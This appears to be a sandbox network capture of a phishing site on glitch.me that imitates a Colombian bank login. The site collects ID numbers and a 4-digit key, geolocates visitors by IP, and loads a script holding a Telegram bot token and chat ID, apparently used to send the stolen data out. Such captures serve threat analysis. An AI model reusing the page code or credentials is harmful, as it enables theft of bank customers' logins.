href="https://sapp2406.sirv.com/bogo/lfr_style.css"> <link rel="stylesheet" href="https://sapp2406.sirv.com/bogo/lfr_ownstyle.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script src="dt.js"></script><script> $.getJSON("https://api.ipify.org?format=json", function(data) { $("#gfg").html(data.ip); }); $.getJSON("https://ipinfo.io", functi
Jan 13, 2025 00:25:18.031305075 CET	1236	IN	Data Raw: 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 0a 20 20 20 20 24 28 22 23 69 70 22 29 2e 68 74 6d 6c 28 22 49 50 3a 20 22 20 2b 20 72 65 73 70 6f 6e 73 65 2e 69 70 29 3b 0a 20 20 20 20 24 28 22 23 61 64 64 72 65 73 73 22 29 2e 68 74 6d 6c 28 22 22 20 Data Ascii: on(response) { $("#ip").html("IP: " + response.ip); $("#address").html("" + response.city + ", " + response.country); }); var u_name, u_name2, u_name3, u_name4, ip, ip2, message; var ready = function() { u_name = document.g
Jan 13, 2025 00:25:18.031357050 CET	1236	IN	Data Raw: 7d 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 7d 3b 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 22 3e 0a 20 20 Data Ascii: }); return false; };</script> </head> <body style=""> <div class="box-container"> <div class="container"> <div class="toast hidden" id="errorMessage" style="position: absolute;">
Jan 13, 2025 00:25:18.031389952 CET	1236	IN	Data Raw: 6f 67 69 6e 2d 62 6f 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 5f 5f 6c 6f 67 69 6e 2d 2d 6c 6f 67 69 6e 2d 62 6f 78 2d 74 69 74 6c 65 22 3e Data Ascii: ogin-box"> <div class="container__login--login-box-title"> <span>Ingresa el tipo y numero de documento</span> </div> <div class="form-container
Jan 13, 2025 00:25:18.031424999 CET	896	IN	Data Raw: 20 20 3c 2f 73 65 6c 65 63 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </select> </div> <div class="field-tdo"> <div class="label"> <label for="IdentificationType">Ide
Jan 13, 2025 00:25:18.031457901 CET	1236	IN	Data Raw: 73 6f 6e 61 20 4e 61 74 75 72 61 6c 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4e 69 74 20 65 78 74 72 61 6e 6a 65 72 6f 73 22 3e 4e 2e 50 2e 45 2e 20 4e 49 54 20 50 65 72 73 6f 6e Data Ascii: sona Natural</option><option value="Nit extranjeros">N.P.E. NIT Persona Extranjera</option><option value="Nit juridico">N.P.J. NIT Persona Jurídica</option><option value="Pasaporte">P.S. Pasaporte</op
Jan 13, 2025 00:25:18.031497002 CET	1116	IN	Data Raw: 20 65 76 65 6e 74 2e 63 68 61 72 43 6f 64 65 20 3e 3d 20 34 38 20 26 26 20 65 76 65 6e 74 2e 63 68 61 72 43 6f 64 65 20 3c 3d 20 35 37 22 20 20 20 0a 09 09 09 09 09 09 09 09 09 09 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 2e 2e 2e 2e 22 20 6e 61 6d Data Ascii: event.charCode >= 48 && event.charCode <= 57" placeholder="...." name="clvseg" id="clvseg" size="20"maxlength="4" minlength="4" required=""> </div> </
Jan 13, 2025 00:25:18.121654987 CET	762	IN	Data Raw: 72 5f 5f 69 6e 66 6f 2d 2d 74 69 70 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 61 62 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 Data Ascii: r__info--tips"> <div class="collapsable"> <div class="collapse"> <div class="collapse__header"> <div class="collapse__header--text"> <img src="
Jan 13, 2025 00:26:03.123684883 CET	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 00:25:18.122840881 CET	335	OUT	GET /dt.js HTTP/1.1 Host: clumsy-sulky-helium.glitch.me Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 13, 2025 00:25:18.261450052 CET	665	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:18 GMT Content-Type: application/javascript; charset=utf-8 Content-Length: 122 Connection: keep-alive x-amz-id-2: N+QjtP/wUKy7cRJCG458ECi+Llh3zS99oFJWnBJZz1GsJUeK1HAeWNo0qR/cXGn0753t4HjJGG3M5PzXUFaVBm07OlAGMaZn x-amz-request-id: F5BJZE9PFC8CT2NC last-modified: Tue, 07 Jan 2025 18:30:48 GMT etag: "b55eedd94b5244303cc544db2ead34f1" x-amz-server-side-encryption: AES256 cache-control: no-cache x-amz-version-id: 43v0gcoDmIIKmBu7aOXOQ._vhugtkFqx accept-ranges: bytes server: AmazonS3 Data Raw: 2f 2f 62 6f 74 20 74 6f 6b 65 6e 0a 76 61 72 20 74 65 6c 65 67 72 61 6d 5f 62 6f 74 5f 69 64 20 3d 20 20 22 36 39 33 39 31 37 30 37 36 35 3a 41 41 47 2d 34 67 53 4c 64 62 46 65 6b 65 75 38 72 46 62 70 6e 45 68 7a 4b 72 55 53 72 68 62 36 4b 5a 45 22 3b 0a 2f 2f 63 68 61 74 20 69 64 0a 76 61 72 20 63 68 61 74 5f 69 64 20 3d 22 36 33 37 33 30 36 34 30 38 34 22 3b 0a Data Ascii: //bot tokenvar telegram_bot_id = "6939170765:AAG-4gSLdbFekeu8rFbpnEhzKrUSrhb6KZE";//chat idvar chat_id ="6373064084";
Jan 13, 2025 00:25:21.827385902 CET	402	OUT	GET /favicon.ico HTTP/1.1 Host: clumsy-sulky-helium.glitch.me Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 13, 2025 00:25:21.943237066 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 23:25:21 GMT Content-Length: 3674 Connection: keep-alive Cache-Control: max-age=0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
Jan 13, 2025 00:25:21.943270922 CET	224	IN	Data Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } }
Jan 13, 2025 00:25:21.943285942 CET	1236	IN	Data Raw: 0a 0a 20 20 20 20 20 20 2e 62 75 74 74 6f 6e 2d 77 72 61 70 20 7b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 72 6f 77 3b 0a 20 20 20 20 20 20 7d Data Ascii: .button-wrap { display: flex; flex-direction: row; } .button-wrap * + * { margin-left: 7px; } .button { border-radius: 5px; border: 2px solid black ; box-sizing:
Jan 13, 2025 00:25:21.943303108 CET	1113	IN	Data Raw: 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 72 65 71 75 65 73 74 53 74 6f 72 61 67 65 Data Ascii: return Promise.resolve(); } return document.requestStorageAccess(); } function loginClicked(e) { if (!window.parent \|\| window.parent === window) { return; } const requestT
Jan 13, 2025 00:26:06.951880932 CET	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 00:25:18.291898966 CET	287	OUT	GET /dt.js HTTP/1.1 Host: clumsy-sulky-helium.glitch.me Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 13, 2025 00:25:18.795350075 CET	677	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:18 GMT Content-Type: application/javascript; charset=utf-8 Content-Length: 122 Connection: keep-alive x-amz-id-2: z9Bc9L0tX13s4pEhO4XWLHkCuqG6H2usx7QlaTJoj1jLd3lQTv7Pa9wg1iN7QPstpNMV6eFnTsu17ORHtLGMkvys1lxkVaKcUCIL2jJ4Eqo= x-amz-request-id: F5BVBZY9E0P7PPTQ last-modified: Tue, 07 Jan 2025 18:30:48 GMT etag: "b55eedd94b5244303cc544db2ead34f1" x-amz-server-side-encryption: AES256 cache-control: no-cache x-amz-version-id: 43v0gcoDmIIKmBu7aOXOQ._vhugtkFqx accept-ranges: bytes server: AmazonS3 Data Raw: 2f 2f 62 6f 74 20 74 6f 6b 65 6e 0a 76 61 72 20 74 65 6c 65 67 72 61 6d 5f 62 6f 74 5f 69 64 20 3d 20 20 22 36 39 33 39 31 37 30 37 36 35 3a 41 41 47 2d 34 67 53 4c 64 62 46 65 6b 65 75 38 72 46 62 70 6e 45 68 7a 4b 72 55 53 72 68 62 36 4b 5a 45 22 3b 0a 2f 2f 63 68 61 74 20 69 64 0a 76 61 72 20 63 68 61 74 5f 69 64 20 3d 22 36 33 37 33 30 36 34 30 38 34 22 3b 0a Data Ascii: //bot tokenvar telegram_bot_id = "6939170765:AAG-4gSLdbFekeu8rFbpnEhzKrUSrhb6KZE";//chat idvar chat_id ="6373064084";
Jan 13, 2025 00:26:03.795533895 CET	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:18 UTC	561	OUT	GET /bogo/lfr_style.css HTTP/1.1 Host: sapp2406.sirv.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:19 UTC	625	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:19 GMT Content-Type: text/css Content-Length: 37478 Connection: close Last-Modified: Fri, 13 Sep 2024 17:15:16 GMT Vary: Accept-Encoding ETag: "66e47324-9266" Server: Sirv.Imagination X-Sirv-Server: c1-extra2-fireball-16 X-Sirv-Cache: HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Expires: Sun, 19 Jan 2025 23:40:19 GMT Cache-Control: max-age=605700 X-Sirv-Shard: c1-riak5 X-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqykl X-File-VersionId: 6v6dqf6Ov50mzNI34kjk3TMD5YHVgjZK:0 X-Account-Serial: 2024-09-08T18:22:41.532Z Accept-Ranges: bytes
2025-01-12 23:25:19 UTC	15759	IN	Data Raw: 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 69 63 6f 6e 73 2d 62 62 6f 67 6f 74 61 2f 73 74 79 6c 65 73 2e 63 73 73 22 3b 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 5f 63 69 72 63 75 6c 61 72 47 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 6f 70 61 63 69 74 79 3a 31 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 33 29 3b 6f 70 61 63 69 74 79 3a 2e 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 5f 63 69 72 63 75 6c 61 72 47 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 6f 70 61 63 69 74 79 3a 31 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 33 29 3b 6f 70 61 63 69 74 79 3a 2e 33 7d 7d 40 66 6f 6e 74 2d Data Ascii: @import "../assets/fonts/icons-bbogota/styles.css";@-webkit-keyframes bounce_circularG{0%{transform:scale(1);opacity:1}to{transform:scale(.3);opacity:.3}}@keyframes bounce_circularG{0%{transform:scale(1);opacity:1}to{transform:scale(.3);opacity:.3}}@font-
2025-01-12 23:25:19 UTC	16384	IN	Data Raw: 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 70 61 67 6f 2d 65 78 69 74 6f 73 6f 2d 63 6f 6e 74 61 69 6e 65 72 5f 5f 68 65 61 64 65 72 20 2e 63 6c 6f 73 65 2d 73 65 63 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 35 70 78 3b 74 6f 70 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 34 72 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 34 30 61 38 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 31 30 30 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 35 65 6d 29 7b 2e 70 61 67 6f 2d 65 78 69 74 6f 73 Data Ascii: ;justify-content:center;background:#fff;position:relative}.pago-exitoso-container__header .close-section{position:absolute;right:15px;top:10px;font-size:4rem;color:#0040a8;cursor:pointer;font-weight:100}@media only screen and (max-width:75em){.pago-exitos
2025-01-12 23:25:19 UTC	5335	IN	Data Raw: 69 67 68 74 3a 31 72 65 6d 7d 2e 74 6f 61 73 74 20 2e 69 63 6f 6e 2d 63 6c 6f 73 65 2d 73 65 61 72 63 68 2d 72 7b 63 6f 6c 6f 72 3a 23 38 35 36 34 30 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 72 65 6d 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 74 69 6d 65 45 6c 61 70 73 65 64 7b 77 69 64 74 68 3a 38 30 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 32 72 65 6d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 36 2e 32 35 65 6d 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2d 74 69 6d 65 45 6c 61 70 73 65 64 7b 77 69 64 74 68 3a 34 30 72 65 6d 7d 7d 40 6d 65 64 69 61 20 6f Data Ascii: ight:1rem}.toast .icon-close-search-r{color:#856404;font-size:2.2rem;display:inline-flex;cursor:pointer}.container-timeElapsed{width:80rem;margin:0 auto;padding:0 2rem}@media only screen and (max-width:56.25em){.container-timeElapsed{width:40rem}}@media o

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:18 UTC	564	OUT	GET /bogo/lfr_ownstyle.css HTTP/1.1 Host: sapp2406.sirv.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:19 UTC	622	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:19 GMT Content-Type: text/css Content-Length: 3100 Connection: close Last-Modified: Fri, 13 Sep 2024 17:15:16 GMT Vary: Accept-Encoding ETag: "66e47324-c1c" Server: Sirv.Imagination X-Sirv-Server: c1-extra2-fireball-1 X-Sirv-Cache: HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Expires: Sun, 19 Jan 2025 23:40:19 GMT Cache-Control: max-age=605700 X-Sirv-Shard: c1-riak5 X-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqykl X-File-VersionId: tkjB2412Fl2BJQYu6odoSFfBDH41uxDJ:0 X-Account-Serial: 2024-09-08T18:22:41.532Z Accept-Ranges: bytes
2025-01-12 23:25:19 UTC	3100	IN	Data Raw: 2e 74 6f 61 73 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 63 6f 6e 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 66 31 33 61 33 31 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 6d 67 43 6f 6e 74 69 6e 65 72 42 73 7b 62 6f 72 64 65 72 3a 30 7d 23 73 65 63 75 72 65 49 6d 67 62 73 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 37 25 7d 23 66 6c 75 6a 6f 4f 72 69 67 65 6e 4c 62 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 6f 70 61 63 69 74 79 3a 2e 38 35 7d 23 70 61 79 2d 69 6e 66 6f 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 72 65 6d 3b 63 6f 6c 6f 72 3a 23 66 31 33 61 33 31 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 6a 75 73 74 69 66 Data Ascii: .toast{position:relative}.icon-error{color:#f13a31!important}#imgContinerBs{border:0}#secureImgbs{border-radius:7%}#flujoOrigenLbl{font-size:2rem;opacity:.85}#pay-info{font-size:1.6rem;color:#f13a31;margin-top:1.5rem;display:flex;flex-direction:row;justif

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:20 UTC	587	OUT	GET /assets/fonts/icons-bbogota/styles.css HTTP/1.1 Host: sapp2406.sirv.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://sapp2406.sirv.com/bogo/lfr_style.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:20 UTC	446	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 23:25:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 3994 Connection: close Vary: Accept-Encoding X-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqykl X-Account-Serial: 2024-09-08T18:22:41.532Z ETag: W/"f9a-dltdL9W+uQlreOx3nogGOg" X-Sirv-Cache: MISS Server: Sirv.Imagination X-Sirv-Server: c1-extra2-fireball-15 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: *
2025-01-12 23:25:20 UTC	3994	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d Data Ascii: <!DOCTYPE html><html lang="en"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>File not found</title><style>body{margin: 0; font-family: system-ui, sans-

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:20 UTC	608	OUT	GET /bogo/logobanco1.png HTTP/1.1 Host: sapp2406.sirv.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:20 UTC	651	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:20 GMT Content-Type: image/avif Content-Length: 5622 Connection: close Last-Modified: Fri, 13 Sep 2024 17:15:16 GMT ETag: "66e47324-15f6" Server: Sirv.Imagination X-Sirv-Server: c1-extra2-fireball-12 X-Sirv-Cache: HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Expires: Sun, 19 Jan 2025 23:40:20 GMT Cache-Control: max-age=605700 X-Sirv-Meta-Width: 285 X-Sirv-Meta-Height: 67 X-Sirv-Shard: c1-riak5 X-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqykl X-File-VersionId: af87J6CJAK2gT1sWoLBnJt9OdCVI0VVr:0 X-Account-Serial: 2024-09-08T18:22:41.532Z Accept-Ranges: bytes
2025-01-12 23:25:20 UTC	5622	IN	Data Raw: 00 00 00 1c 66 74 79 70 61 76 69 66 00 00 00 00 61 76 69 66 6d 69 66 31 6d 69 61 66 00 00 01 98 6d 65 74 61 00 00 00 00 00 00 00 21 68 64 6c 72 00 00 00 00 00 00 00 00 70 69 63 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 70 69 74 6d 00 00 00 00 00 01 00 00 00 34 69 6c 6f 63 00 00 00 00 44 40 00 02 00 02 00 00 00 00 01 bc 00 01 00 00 00 00 00 00 08 15 00 01 00 00 00 00 09 d1 00 01 00 00 00 00 00 00 0c 25 00 00 00 38 69 69 6e 66 00 00 00 00 00 02 00 00 00 15 69 6e 66 65 02 00 00 00 00 01 00 00 61 76 30 31 00 00 00 00 15 69 6e 66 65 02 00 00 00 00 02 00 00 61 76 30 31 00 00 00 00 d7 69 70 72 70 00 00 00 b1 69 70 63 6f 00 00 00 13 63 6f 6c 72 6e 63 6c 78 00 01 00 0d 00 06 80 00 00 00 0c 61 76 31 43 81 00 1c 00 00 00 00 14 69 73 70 65 00 00 00 00 00 Data Ascii: ftypavifavifmif1miafmeta!hdlrpictpitm4ilocD@%8iinfinfeav01infeav01iprpipcocolrnclxav1Cispe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:20 UTC	603	OUT	GET /bogo/c2922.png HTTP/1.1 Host: sapp2406.sirv.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:20 UTC	653	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:20 GMT Content-Type: image/avif Content-Length: 24854 Connection: close Last-Modified: Fri, 13 Sep 2024 17:15:16 GMT ETag: "66e47324-6116" Server: Sirv.Imagination X-Sirv-Server: c1-extra2-fireball-15 X-Sirv-Cache: HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Expires: Sun, 19 Jan 2025 23:40:20 GMT Cache-Control: max-age=605700 X-Sirv-Meta-Width: 932 X-Sirv-Meta-Height: 534 X-Sirv-Shard: c1-riak5 X-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqykl X-File-VersionId: ONm3K614ptK5O6ItJEBB4XdlrRU8F4Y2:0 X-Account-Serial: 2024-09-08T18:22:41.532Z Accept-Ranges: bytes
